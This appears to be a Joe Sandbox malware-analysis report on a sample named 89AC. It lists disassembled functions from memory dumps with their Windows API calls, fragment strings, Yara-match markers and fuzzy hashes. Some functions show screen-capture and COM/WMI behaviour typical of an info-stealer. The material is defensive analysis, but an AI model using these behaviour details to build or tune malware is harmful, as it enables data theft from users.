Download Yara Rule

APIs

CoCreateInstance.OLE32(CDCCD3E7,00000000,00000001,?,00000000), ref: 0043BCCC
SysAllocString.OLEAUT32(37C935C6), ref: 0043BD46
CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043BD84
SysAllocString.OLEAUT32(37C935C6), ref: 0043BDE9
SysAllocString.OLEAUT32(37C935C6), ref: 0043BED0
VariantInit.OLEAUT32(?), ref: 0043BF3E

Strings

:;$%, xrefs: 0043C2EC
k"@ , xrefs: 0043BE3A
[&h$, xrefs: 0043BE32
96, xrefs: 0043BE52
F*R(, xrefs: 0043BE2A
n:T8, xrefs: 0043BE4A
#~|, xrefs: 0043B8A7
e?^, xrefs: 0043BC4F
M, xrefs: 0043BB5B
#~|, xrefs: 0043B89D

Memory Dump Source

Source File: 00000007.00000002.1601259015.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1601259015.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_89AC.jbxd

Similarity

API ID: AllocString$BlanketCreateInitInstanceProxyVariant
String ID: M$96$:;$%$F*R($[&h$$e?^$k"@ $n:T8$#~|$#~|
API String ID: 65563702-2807872674
Opcode ID: b9f6e505c8dc3f742046bcb89f644a5fe799d125bb799c1c1616f98f374443e3
Instruction ID: 0fa8c84a7900d0f22f2d4f21e88135ff08406c7ea1f94cba9a5970d36c475c8e
Opcode Fuzzy Hash: b9f6e505c8dc3f742046bcb89f644a5fe799d125bb799c1c1616f98f374443e3
Instruction Fuzzy Hash: 735202726083408BD714CF68C88176BFBE1EF89314F189A2EE5D597391D778D806CB96

Function 0215BAD7 Relevance: 32.4, APIs: 8, Strings: 10, Instructions: 880memorycomCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE(CDCCD3E7,00000000,00000001,?,00000000), ref: 0215BF33
SysAllocString.OLEAUT32(37C935C6), ref: 0215BFAD
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0215BFEB
SysAllocString.OLEAUT32(37C935C6), ref: 0215C050
SysAllocString.OLEAUT32(37C935C6), ref: 0215C137
VariantInit.OLEAUT32(?), ref: 0215C1A5

Strings

n:T8, xrefs: 0215C0B1
:;$%, xrefs: 0215C553
M, xrefs: 0215BDC2
[&h$, xrefs: 0215C099
#~|, xrefs: 0215BB0E
96, xrefs: 0215C0B9
e?^, xrefs: 0215BEB6
F*R(, xrefs: 0215C091
k"@ , xrefs: 0215C0A1
#~|, xrefs: 0215BB04

Memory Dump Source

Source File: 00000007.00000002.1602257379.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2120000_89AC.jbxd

Yara matches

Similarity

API ID: AllocString$BlanketCreateInitInstanceProxyVariant
String ID: M$96$:;$%$F*R($[&h$$e?^$k"@ $n:T8$#~|$#~|
API String ID: 65563702-2807872674
Opcode ID: 9f1f51344e39299604904236268e70905638ee0f88f663c1ee43faa23c8ba667
Instruction ID: 22579b463e9b324c06a718f8922b45726a2d70ae01147e094aed06dd4a28a699
Opcode Fuzzy Hash: 9f1f51344e39299604904236268e70905638ee0f88f663c1ee43faa23c8ba667
Instruction Fuzzy Hash: 0352E0726483508FD724CF28C8917ABFBE1EF85314F188A6DE9A587391D774D806CB92

Function 00436980 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 230windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00436989
GetSystemMetrics.USER32(0000004C), ref: 00436999
GetSystemMetrics.USER32(0000004D), ref: 004369A1
GetCurrentObject.GDI32(00000000,00000007), ref: 004369AA
GetObjectW.GDI32(00000000,00000018,?), ref: 004369BA
DeleteObject.GDI32(00000000), ref: 004369C1
CreateCompatibleDC.GDI32(00000000), ref: 004369D0
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004369DB
SelectObject.GDI32(00000000,00000000), ref: 004369E7
BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 00436A0A

Strings

Y, xrefs: 00436BEE

Memory Dump Source

Source File: 00000007.00000002.1601259015.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1601259015.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_89AC.jbxd

Similarity

API ID: Object$CompatibleCreateMetricsSystem$BitmapCurrentDeleteSelect
String ID: Y
API String ID: 1298755333-3233089245
Opcode ID: c24b2a11f15356cf646cf834205c4c04271eabb57bf08da4818dca27ea7b735a
Instruction ID: ce6842184c50d62c14bce23637ee5c5f438d7dfa952fd3edf86735d4080956a5
Opcode Fuzzy Hash: c24b2a11f15356cf646cf834205c4c04271eabb57bf08da4818dca27ea7b735a
Instruction Fuzzy Hash: 4A81C33A158310EFD7489FB4AC49A3B7BA5FB8A352F050C3CF546D2290C73995168B2B

Function 00425100 Relevance: 25.0, APIs: 3, Strings: 11, Instructions: 480COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000), ref: 004251AA
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000), ref: 00425243

Strings

.T'j, xrefs: 004253BB
,X*^, xrefs: 004253A3
1D6Z, xrefs: 0042539B
+$e, xrefs: 004251F2
C`<f, xrefs: 004253D3
]RB, xrefs: 00425257
%\)R, xrefs: 004253AB
:@&F, xrefs: 00425393
?P:V, xrefs: 004253B3
XY, xrefs: 00425146
+$e, xrefs: 00425165, 0042517A

Memory Dump Source

Source File: 00000007.00000002.1601259015.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1601259015.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_89AC.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: +$e$+$e$%\)R$,X*^$.T'j$1D6Z$:@&F$?P:V$C`<f$XY$]RB
API String ID: 237503144-2846770461
Opcode ID: be84ad2a2dc8deef5579fea24953012850529ab1ccaeb00d1e318e8ad6242404
Instruction ID: b6d59b0557f70d7ec2d4011febfa6e18cf4a5b2df19338a98cc8181bc2575411
Opcode Fuzzy Hash: be84ad2a2dc8deef5579fea24953012850529ab1ccaeb00d1e318e8ad6242404
Instruction Fuzzy Hash: E7F1EDB4208350DFD310DF69E89166BBBE0FFC5314F54892DE5958B362E7B88906CB46

Function 00419840 Relevance: 16.7, APIs: 2, Strings: 7, Instructions: 936COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 00419CE7
FreeLibrary.KERNEL32(?), ref: 00419D24

Part of subcall function 004402C0: LdrInitializeThunk.NTDLL(0044316E,007E70F8,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 004402EE

Strings

~|, xrefs: 00419B2E
if, xrefs: 00419B1C
SP, xrefs: 00419BF2
ou, xrefs: 00419CE7, 00419D24
pv, xrefs: 00419BB2
vt, xrefs: 00419AFC
tj, xrefs: 00419BBA

Memory Dump Source

Source File: 00000007.00000002.1601259015.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1601259015.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_89AC.jbxd

Similarity

API ID: FreeLibrary$InitializeThunk
String ID: ~|$SP$if$ou$pv$tj$vt
API String ID: 764372645-2999605838
Opcode ID: e0b58ed5ff15dc801148dc9f86a9132d6192a83ea1caeaa00bd99fa001171b69
Instruction ID: c1c817f51924b2b6e01bbc71c3bfe870e6f9d21007064de5033cd7ab66586395
Opcode Fuzzy Hash: e0b58ed5ff15dc801148dc9f86a9132d6192a83ea1caeaa00bd99fa001171b69
Instruction Fuzzy Hash: 5D624770609310AFE724CB15DC9176BB7E2EFC5314F18862DF495973A1D378AC858B4A

Function 00425D6A Relevance: 15.8, Strings: 12, Instructions: 778COMMON

Download Yara Rule

Strings

$@7F, xrefs: 0042633C
&$, xrefs: 004266A0
uVw, xrefs: 00425EA0
4D2Z, xrefs: 00426346
T`Sf, xrefs: 0042638C
2E1G, xrefs: 00426876
+\1R, xrefs: 0042635A
qs, xrefs: 00425E96
Wdz, xrefs: 00426396
-T,j, xrefs: 0042636E
8I>K, xrefs: 00426858
(X#^, xrefs: 00426350

Memory Dump Source

Source File: 00000007.00000002.1601259015.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1601259015.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_89AC.jbxd

Similarity

API ID:
String ID: $@7F$(X#^$+\1R$-T,j$2E1G$4D2Z$8I>K$T`Sf$Wdz$&$$qs$uVw
API String ID: 0-2419925205
Opcode ID: dbc9d13701a6f1f84a1fbda366b061da39485b638189b278c3f43e1cc0e4d0b6
Instruction ID: c261d025133841230159ca5431fd9423a817dc7e9349410c690f11e8db15d26c
Opcode Fuzzy Hash: dbc9d13701a6f1f84a1fbda366b061da39485b638189b278c3f43e1cc0e4d0b6
Instruction Fuzzy Hash: FA7283B4A05269CFDB24CF55D881BDDBBB2FB46300F1181E9C5496B362DB349A86CF84

Function 02139AA7 Relevance: 14.9, APIs: 2, Strings: 6, Instructions: 936COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 02139F4E
FreeLibrary.KERNEL32(?), ref: 02139F8B

Strings

if, xrefs: 02139D83
vt, xrefs: 02139D63
pv, xrefs: 02139E19
~|, xrefs: 02139D95
SP, xrefs: 02139E59
tj, xrefs: 02139E21

Memory Dump Source

Source File: 00000007.00000002.1602257379.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2120000_89AC.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: ~|$SP$if$pv$tj$vt
API String ID: 3664257935-1422159894
Opcode ID: 557abf3bdc5e1b4c31fa4c16cb7a998475db0352c266ee35ae4fbd844e0422db
Instruction ID: e2eac73cbe87cdc2d4beae29a7664ba6869d68db678d4a72f8485a67063f56e2
Opcode Fuzzy Hash: 557abf3bdc5e1b4c31fa4c16cb7a998475db0352c266ee35ae4fbd844e0422db
Instruction Fuzzy Hash: BF620570689360AFE725CF18CC81B3BB7E7EF85318F18862CE4D5972A1D371A8458B95

Function 00417405 Relevance: 13.4, APIs: 4, Strings: 3, Instructions: 1110COMMON

Download Yara Rule

Strings

O, xrefs: 00417625
5&'d, xrefs: 004175E5
~, xrefs: 00418158

Memory Dump Source

Source File: 00000007.00000002.1601259015.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1601259015.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_89AC.jbxd

Similarity

API ID:
String ID: 5&'d$O$~
API String ID: 0-1622812124
Opcode ID: 8b914b4801975b71dea4b75609ed348123c7e1e6468bc6ef1cacffb89bf502a6
Instruction ID: 7c8e188e2ff574dc84e1e58bec60109b2722ae2eee07efcef2931a8160e5a92b
Opcode Fuzzy Hash: 8b914b4801975b71dea4b75609ed348123c7e1e6468bc6ef1cacffb89bf502a6
Instruction Fuzzy Hash: AC820F7550C3518BC324CF28C8917ABB7E1FF99314F198A6EE4C99B391E7389941CB4A

Function 004257E0 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 295COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 004258F4
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 0042595D

Strings

`J/H, xrefs: 00425826
=^"\, xrefs: 00425ABF
B"@, xrefs: 00425818
)RSP, xrefs: 004259A1
rp, xrefs: 00425834

Memory Dump Source

Source File: 00000007.00000002.1601259015.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1601259015.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_89AC.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: B"@$)RSP$=^"\$`J/H$rp
API String ID: 237503144-816972838
Opcode ID: bf1cafb989073c4553b17663fd8b05ca961829d4f2cee33832e91d81a2f5237f
Instruction ID: cd6e5e946c3164ee33c4da05371f075d598195140dbb1deecb8ac0c04a2143aa
Opcode Fuzzy Hash: bf1cafb989073c4553b17663fd8b05ca961829d4f2cee33832e91d81a2f5237f
Instruction Fuzzy Hash: 9DA110B6E402188FDB10CFA8DC827EEBBB1FF85314F154169E414AB291D7B59942CB94

Function 00415720 Relevance: 11.8, Strings: 8, Instructions: 1798COMMON

Download Yara Rule

Strings

F2}0, xrefs: 00415A76
L, xrefs: 004162B2
a, xrefs: 004163D3
R(RW, xrefs: 00416265
9?4<, xrefs: 00416345
NR@:, xrefs: 00416291
DASS, xrefs: 0041629C
BYQZ, xrefs: 00416286

Memory Dump Source

Source File: 00000007.00000002.1601259015.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1601259015.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_89AC.jbxd

Similarity

API ID:
String ID: 9?4<$BYQZ$DASS$F2}0$L$NR@:$R(RW$a
API String ID: 0-3642574725
Opcode ID: 83579c757a543f9f659438346f364b36b2e078702eec510370abc902ff0d75f9
Instruction ID: 7f7427958d78b94ffc8c4a18595fe2cbb503adca6349e1c34573b0944bc9dd97
Opcode Fuzzy Hash: 83579c757a543f9f659438346f364b36b2e078702eec510370abc902ff0d75f9
Instruction Fuzzy Hash: 80C21675608350DFD7209F28D8957ABB7E2EFC6314F19892DE4C98B391EB389841CB46

Function 0041C400 Relevance: 10.8, Strings: 8, Instructions: 842COMMON

Download Yara Rule

Strings

*H%N, xrefs: 0041C8EF
+P%V, xrefs: 0041C8FD
,\/b, xrefs: 0041C912
C`6f, xrefs: 0041C73C, 0041CBB1, 0041CC7D
4D"J, xrefs: 0041C8E8
C`6f, xrefs: 0041C919
2T'Z, xrefs: 0041C904
,X0^, xrefs: 0041C90B

Memory Dump Source

Source File: 00000007.00000002.1601259015.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1601259015.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_89AC.jbxd

Similarity

API ID:
String ID: *H%N$+P%V$,X0^$,\/b$2T'Z$4D"J$C`6f$C`6f
API String ID: 0-102253164
Opcode ID: 7d18ccd7fb329c2f7a5c3569352263da56546af64857bf12c5cea43640fe8961
Instruction ID: 7c24634cc790d3dc5544db0222c0a2221dcce8583ae8b0beabc19f11c9a677e2
Opcode Fuzzy Hash: 7d18ccd7fb329c2f7a5c3569352263da56546af64857bf12c5cea43640fe8961
Instruction Fuzzy Hash: 923202B19402118BCB24CF24CC927A7B7B2FF95314F28829DD851AF395E779A842CBD5

Function 0213C667 Relevance: 10.8, Strings: 8, Instructions: 842COMMON

Download Yara Rule

Strings

,\/b, xrefs: 0213CB79
,X0^, xrefs: 0213CB72
*H%N, xrefs: 0213CB56
C`6f, xrefs: 0213C9A3, 0213CE18, 0213CEE4
+P%V, xrefs: 0213CB64
2T'Z, xrefs: 0213CB6B
C`6f, xrefs: 0213CB80
4D"J, xrefs: 0213CB4F

Memory Dump Source

Source File: 00000007.00000002.1602257379.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2120000_89AC.jbxd

Yara matches

Similarity

API ID:
String ID: *H%N$+P%V$,X0^$,\/b$2T'Z$4D"J$C`6f$C`6f
API String ID: 0-102253164
Opcode ID: f96fe7a7a370e0a426616b44d01145cf498bc23b6eb0afd2ea812e4552abdc14
Instruction ID: 80c35cace215214b12cfc0534341df1f7aad7f8b27db99d9c2a079a9f3c9b5bd
Opcode Fuzzy Hash: f96fe7a7a370e0a426616b44d01145cf498bc23b6eb0afd2ea812e4552abdc14
Instruction Fuzzy Hash: C93237B19402118BCB25CF24C8927B7B7B2FF95318F29829DD8416F794E775A902CBD1

Function 02128AE7 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 180threadCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 02128B0B
GetCurrentThreadId.KERNEL32 ref: 02128B15
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 02128BBC
GetForegroundWindow.USER32 ref: 02128BD1
ExitProcess.KERNEL32 ref: 02128D1E

Strings

6W01, xrefs: 02128C1C

Memory Dump Source

Source File: 00000007.00000002.1602257379.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2120000_89AC.jbxd

Yara matches

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID: 6W01
API String ID: 4063528623-326071965
Opcode ID: bfbdd2f4eb40b0c99f42f083f1dd3dcee64ae0e50d961520efab8e0958816b30
Instruction ID: c05055871eeab1f82eeb68f09f850cca453cecb909c2ed5ed9aa93c88ed492b4
Opcode Fuzzy Hash: bfbdd2f4eb40b0c99f42f083f1dd3dcee64ae0e50d961520efab8e0958816b30
Instruction Fuzzy Hash: 2C518B73A843140FD328AF688C45356BAC79BC1314F1BC139A995AB3E5EB78881A87D5

Function 0040D545 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 349COMMON

Download Yara Rule

APIs

Part of subcall function 00436980: GetDC.USER32(00000000), ref: 00436989
Part of subcall function 00436980: GetSystemMetrics.USER32(0000004C), ref: 00436999
Part of subcall function 00436980: GetSystemMetrics.USER32(0000004D), ref: 004369A1
Part of subcall function 00436980: GetCurrentObject.GDI32(00000000,00000007), ref: 004369AA
Part of subcall function 00436980: GetObjectW.GDI32(00000000,00000018,?), ref: 004369BA
Part of subcall function 00436980: DeleteObject.GDI32(00000000), ref: 004369C1
Part of subcall function 00436980: CreateCompatibleDC.GDI32(00000000), ref: 004369D0
Part of subcall function 00436980: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004369DB
Part of subcall function 00436980: SelectObject.GDI32(00000000,00000000), ref: 004369E7
Part of subcall function 00436980: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 00436A0A

CoUninitialize.OLE32 ref: 0040D555

Strings

|qay, xrefs: 0040D641
~wxH, xrefs: 0040D64F
?C*], xrefs: 0040D7A4
9Y, xrefs: 0040D854
&W-Q, xrefs: 0040D7B9

Memory Dump Source

Source File: 00000007.00000002.1601259015.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1601259015.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_89AC.jbxd

Similarity

API ID: Object$CompatibleCreateMetricsSystem$BitmapCurrentDeleteSelectUninitialize
String ID: &W-Q$9Y$?C*]$|qay$~wxH
API String ID: 3213364925-1959178137
Opcode ID: ae45af60d508102decc7da59701e9a4893ce939ff9a93b35a5cd895196908ad5
Instruction ID: aef483f231ee1e61a479db6060b0077f9689b526eef662d52e770a901b229f69
Opcode Fuzzy Hash: ae45af60d508102decc7da59701e9a4893ce939ff9a93b35a5cd895196908ad5
Instruction Fuzzy Hash: EEB115756047818BE325CF2AC4D0762BBE2FF96300B18C5ADC4D64BB86D738A806CB95

Function 0212D7AC Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 349COMMON

Download Yara Rule

APIs

Part of subcall function 02156BE7: GetDC.USER32(00000000), ref: 02156BF0
Part of subcall function 02156BE7: GetCurrentObject.GDI32(00000000,00000007), ref: 02156C11
Part of subcall function 02156BE7: GetObjectW.GDI32(00000000,00000018,?), ref: 02156C21
Part of subcall function 02156BE7: DeleteObject.GDI32(00000000), ref: 02156C28
Part of subcall function 02156BE7: CreateCompatibleDC.GDI32(00000000), ref: 02156C37
Part of subcall function 02156BE7: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02156C42
Part of subcall function 02156BE7: SelectObject.GDI32(00000000,00000000), ref: 02156C4E
Part of subcall function 02156BE7: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 02156C71

CoUninitialize.COMBASE ref: 0212D7BC

Strings

~wxH, xrefs: 0212D8B6
9Y, xrefs: 0212DABB
&W-Q, xrefs: 0212DA20
|qay, xrefs: 0212D8A8
?C*], xrefs: 0212DA0B

Memory Dump Source

Source File: 00000007.00000002.1602257379.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2120000_89AC.jbxd

Yara matches

Similarity

API ID: Object$CompatibleCreate$BitmapCurrentDeleteSelectUninitialize
String ID: &W-Q$9Y$?C*]$|qay$~wxH
API String ID: 3248263802-1959178137
Opcode ID: ae45af60d508102decc7da59701e9a4893ce939ff9a93b35a5cd895196908ad5
Instruction ID: 505383bc6be7141dcf51d04b3f25a9e29218e1cc591af443e2b6d03d69e8483b
Opcode Fuzzy Hash: ae45af60d508102decc7da59701e9a4893ce939ff9a93b35a5cd895196908ad5
Instruction Fuzzy Hash: B6B135756447918FE725CF2AC4E0762BBE2FF96304B18C1ACE4D24BB4AC739A416CB51

Function 00425AF0 Relevance: 7.8, Strings: 6, Instructions: 289COMMON

Download Yara Rule

Strings

bX_^, xrefs: 00425BBD
=^"\, xrefs: 00425ABF
C@, xrefs: 00425C40
K3, xrefs: 00425C4A
)RSP, xrefs: 004259A1
B:, xrefs: 00425C36

Memory Dump Source

Source File: 00000007.00000002.1601259015.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1601259015.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_89AC.jbxd

Similarity

API ID:
String ID: )RSP$=^"\$B:$C@$K3$bX_^
API String ID: 0-3030200349
Opcode ID: b7b7d5e1b28ee3cbee9031abf066d5bdbea60043203f55f78b2bc464f190e4c2
Instruction ID: 361e1606381cfafdf419846c5dd42b56ab67650ac9a68572a77bc4f7112e5621
Opcode Fuzzy Hash: b7b7d5e1b28ee3cbee9031abf066d5bdbea60043203f55f78b2bc464f190e4c2
Instruction Fuzzy Hash: 77B120B6E002288FDB20CF68DC427DEBBB1FB85314F1981A9E418AB351D7785D468F91

Function 0042EA62 Relevance: 5.3, Strings: 4, Instructions: 331COMMON

Download Yara Rule

Strings

4b, xrefs: 0042EDDA
8<j?, xrefs: 0042ED50
D, xrefs: 0042ED68
0, xrefs: 0042ED00

Memory Dump Source

Source File: 00000007.00000002.1601259015.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1601259015.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_89AC.jbxd

Similarity

API ID:
String ID: 0$8<j?$D$4b
API String ID: 0-1320392364
Opcode ID: c5bccc6a1462223a6a16399cddfc4de50993b4880fcb804883e5cf7c287459bb
Instruction ID: 2b7b52935a6d5b5a4047c1575b3543403dadbc3efec4758ce9a79863674c7261
Opcode Fuzzy Hash: c5bccc6a1462223a6a16399cddfc4de50993b4880fcb804883e5cf7c287459bb
Instruction Fuzzy Hash: 9F91F66030C3918BD718CF3A946136BBBD19FD6314F69896EE4D68B391D23CC406871A

Function 0214ECC9 Relevance: 5.3, Strings: 4, Instructions: 331COMMON

Download Yara Rule

Strings

8<j?, xrefs: 0214EFB7
0, xrefs: 0214EF67
4b, xrefs: 0214F041
D, xrefs: 0214EFCF

Memory Dump Source

Source File: 00000007.00000002.1602257379.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2120000_89AC.jbxd

Yara matches

Similarity

API ID:
String ID: 0$8<j?$D$4b
API String ID: 0-1320392364
Opcode ID: c5bccc6a1462223a6a16399cddfc4de50993b4880fcb804883e5cf7c287459bb
Instruction ID: d1a89eca020742505846615fbb842452156a60f2185f3448a97bd788897e8ec2
Opcode Fuzzy Hash: c5bccc6a1462223a6a16399cddfc4de50993b4880fcb804883e5cf7c287459bb
Instruction Fuzzy Hash: 8C91F96024C3818BD718CF3984A137AFBD2AFD6218F29896DE4DACB391D739C506C716

Function 0041BBA0 Relevance: 5.3, Strings: 4, Instructions: 325COMMON

Download Yara Rule

Strings

,D,J, xrefs: 0041BD19
'P0V, xrefs: 0041BD31
WT, xrefs: 0041BD39
9HiN, xrefs: 0041BD21

Memory Dump Source

Source File: 00000007.00000002.1601259015.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1601259015.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_89AC.jbxd

Similarity

API ID:
String ID: 'P0V$,D,J$9HiN$WT
API String ID: 0-3770969982
Opcode ID: db0a98afcbfdb664a44cceaff5c849975bf5989fe3d7f245b03da2a88515caab
Instruction ID: 1a2b24427ca50ea0613cce179253f9256e84f06a3d156f412d4f3691be65671a
Opcode Fuzzy Hash: db0a98afcbfdb664a44cceaff5c849975bf5989fe3d7f245b03da2a88515caab
Instruction Fuzzy Hash: 72B123B664D3549BD304CF62D8802AFBBE2FBC1314F098D2DE1C897341D779884A8B86

Function 0213BE2C Relevance: 5.2, Strings: 4, Instructions: 223COMMON

Download Yara Rule

Strings

,D,J, xrefs: 0213BF80
WT, xrefs: 0213BFA0
9HiN, xrefs: 0213BF88
'P0V, xrefs: 0213BF98

Memory Dump Source

Source File: 00000007.00000002.1602257379.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2120000_89AC.jbxd

Yara matches

Similarity

API ID:
String ID: 'P0V$,D,J$9HiN$WT
API String ID: 0-3770969982
Opcode ID: 0e2b0cc12e3226d2cd341a2167d348b6fcb24ba631dfe2d9486f098724b9ef4e
Instruction ID: 319f5c6b95c1bc5fc40a65ce882d7e1830f67a4afa8680d5e5370f2bb64bb506
Opcode Fuzzy Hash: 0e2b0cc12e3226d2cd341a2167d348b6fcb24ba631dfe2d9486f098724b9ef4e
Instruction Fuzzy Hash: 4871D0B654D3958BD304DF12C8802AFBBE2FBC1314F188E2CE1D86B251D739854A8F86

Function 02145D57 Relevance: 5.1, Strings: 4, Instructions: 132COMMON

Download Yara Rule

Strings

bX_^, xrefs: 02145E24
B:, xrefs: 02145E9D
C@, xrefs: 02145EA7
K3, xrefs: 02145EB1

Memory Dump Source

Source File: 00000007.00000002.1602257379.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2120000_89AC.jbxd

Yara matches

Similarity

API ID:
String ID: B:$C@$K3$bX_^
API String ID: 0-595269213
Opcode ID: 0d06cbe45fa1c6c57b514cd4ae27e395b8e4d2b4ab09be3f8917ba205efd2598
Instruction ID: 5056f1075d83cc1f449750994906fce7855c34f991b27d664a02d1331d882721
Opcode Fuzzy Hash: 0d06cbe45fa1c6c57b514cd4ae27e395b8e4d2b4ab09be3f8917ba205efd2598
Instruction Fuzzy Hash: C741CEB5D102289FDB20DF79CD867DDBFB1AB85300F4442AAE448A7295D7340E4A8FD2

Function 0042EB5F Relevance: 4.1, Strings: 3, Instructions: 313COMMON

Download Yara Rule

Strings

4b, xrefs: 0042EDDA
8<j?, xrefs: 0042ED50
D, xrefs: 0042ED68

Memory Dump Source

Source File: 00000007.00000002.1601259015.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1601259015.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_89AC.jbxd

Similarity

API ID:
String ID: 8<j?$D$4b
API String ID: 0-2390459867
Opcode ID: d7cf588a064f1155daa4d7c44af41ec226caa0cd09314393bb3aaf469a1037c3
Instruction ID: 3d775767d977819f4cd04dfa65fb75d6d4b79ad1faca8718d285b39be461a68a
Opcode Fuzzy Hash: d7cf588a064f1155daa4d7c44af41ec226caa0cd09314393bb3aaf469a1037c3
Instruction Fuzzy Hash: 1781F86020C3928BD719CF3A946137BBFD19FD6314F69896EE4D68B381D27DC406871A

Function 0042EBB3 Relevance: 4.1, Strings: 3, Instructions: 313COMMON

Download Yara Rule

Strings

4b, xrefs: 0042EDDA
8<j?, xrefs: 0042ED50
D, xrefs: 0042ED68

